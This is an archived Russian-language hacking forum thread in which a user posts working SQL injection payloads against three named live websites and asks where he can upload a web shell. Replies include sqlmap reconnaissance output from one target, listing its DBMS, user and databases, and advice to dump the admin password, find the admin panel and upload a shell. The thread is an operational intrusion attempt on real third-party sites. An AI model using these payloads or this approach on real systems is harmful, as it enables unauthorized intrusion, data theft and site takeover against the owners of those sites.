PDA

Просмотр полной версии : Помогите залить Shell (Mysql Injection)


Миxей
02.04.2018, 19:32
woodlandcenters.com/news.php?id=-3529 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171626a71,0x79634249 4373766a436e43444850717857576b696a64565a5074476165 714b644c63614a6a4b7675,0x716a707a71)-- NzCQ



arvsolutions.co.uk/news.php?id=39 (https://www.arvsolutions.co.uk/news.php?id=39)' AND 3547=3547 AND 'OEvV'='OEvV

justindellojoio.com/news.php?id=12 (http://www.justindellojoio.com/news.php?id=12) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b7071,0x6f76755243634 e55624c6143584167734f435768575273425876636a6d63766 35874497069734c53,0x716a767671),NULL,NULL,NULL-- reTC

Как узнать папку в которую можно залить shell ?

lifescore
03.04.2018, 00:23
Господи помилуй этого человека..

[23:20:32] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu

web application technology: Apache 2.4.7, PHP 5.5.9

back-end DBMS: MySQL >= 5.0.12

[23:20:32] [INFO] fetching current user

current user: 'justin@localhost'

[23:20:33] [INFO] fetching current database

current database: 'justin'

[23:20:33] [INFO] testing if current user is DBA

[23:20:33] [INFO] fetching current user

[23:20:33] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

current user is DBA: False

[23:20:33] [INFO] fetching database names

available databases [2]:

information_schema

justin

https://www.aldeid.com/wiki/From-common-sql-injection-to-system-compromise

BabaDook
03.04.2018, 00:31
Миxей said:
↑ (https://antichat.live/posts/4198633/)
woodlandcenters.com/news.php?
id=-3529 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171626a71,0x79634249 4373766a436e43444850717857576b696a64565a5074476165 714b644c63614a6a4b7675,0x716a707a71)-- NzCQ


arvsolutions.co.uk/news.php?id=39 (https://www.arvsolutions.co.uk/news.php?id=39)
' AND 3547=3547 AND 'OEvV'='OEvV
justindellojoio.com/news.php?id=12 (http://www.justindellojoio.com/news.php?id=12)
UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b7071,0x6f76755243634 e55624c6143584167734f435768575273425876636a6d63766 35874497069734c53,0x716a767671),NULL,NULL,NULL-- reTC
Как узнать папку в которую можно залить shell ?


Через уязвимость никак, сливайте пароль, ищите админку и пробуйте заливать шелл

lifescore
03.04.2018, 01:00
Миxей said:
↑ (https://antichat.live/posts/4198633/)
woodlandcenters.com/news.php?
id=-3529 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171626a71,0x79634249 4373766a436e43444850717857576b696a64565a5074476165 714b644c63614a6a4b7675,0x716a707a71)-- NzCQ


arvsolutions.co.uk/news.php?id=39 (https://www.arvsolutions.co.uk/news.php?id=39)
' AND 3547=3547 AND 'OEvV'='OEvV
justindellojoio.com/news.php?id=12 (http://www.justindellojoio.com/news.php?id=12)
UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b7071,0x6f76755243634 e55624c6143584167734f435768575273425876636a6d63766 35874497069734c53,0x716a767671),NULL,NULL,NULL-- reTC
Как узнать папку в которую можно залить shell ?



Найди пол часа свободного времени для ознакомления

https://www.tenable.com/blog/configuration-auditing-phpini-to-help-prevent-web-application-attacks

Да бы знать что одних привелегий на запись файлов еще не досаточно. И вопрос по папкам там тоже присутствует.